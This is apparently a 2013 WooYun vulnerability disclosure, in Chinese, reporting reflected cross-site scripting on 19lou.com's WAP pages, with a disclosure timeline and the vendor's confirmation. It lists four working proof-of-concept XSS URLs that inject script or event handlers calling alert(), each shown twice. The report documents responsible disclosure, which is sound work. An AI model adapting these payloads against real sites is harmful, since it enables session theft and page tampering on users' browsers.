漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2013-10-17: 细节已通知厂商并且等待厂商处理中
2013-10-17: 厂商已经确认,细节仅向厂商公开
2013-10-27: 细节向核心白帽子及相关领域专家公开
2013-11-06: 细节向普通白帽子公开
2013-11-16: 细节向实习白帽子公开
2013-12-01: 细节向公众公开
简要描述:
凑热闹啊凑热闹
详细说明:
十九楼 网友中心 处 过滤不当
问题出在wap页面上,web页面过滤了,但是wap页面就没过滤
http://www.19lou.com/thread/category/structure/search/result?m=10001&fid=1637&mf_1391=%22%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E//
http://house.19lou.com/newhouse?houseType=%22%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E//
http://edu.19lou.com/school/search 1" onmouseover=alert(1)//
http://wt.19lou.com/ip.php?callback=1%22/%3E%3Cimg/src=@%20onerror=alert%2810%29%3E
就不截图了
漏洞证明:
十九楼 网友中心 处 过滤不当
问题出在wap页面上,web页面过滤了,但是wap页面就没过滤
http://www.19lou.com/thread/category/structure/search/result?m=10001&fid=1637&mf_1391=%22%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E//
http://house.19lou.com/newhouse?houseType=%22%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E//
http://edu.19lou.com/school/search 1" onmouseover=alert(1)//
http://wt.19lou.com/ip.php?callback=1%22/%3E%3Cimg/src=@%20onerror=alert%2810%29%3E
就不截图了
修复方案:
过滤输入/输出
版权声明:转载请注明来源 icysun@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2013-10-17 21:42
厂商回复:
谢谢撸主,后面4个反射的其实已掌握,只是还没修复,再次感谢.:)
最新状态:
暂无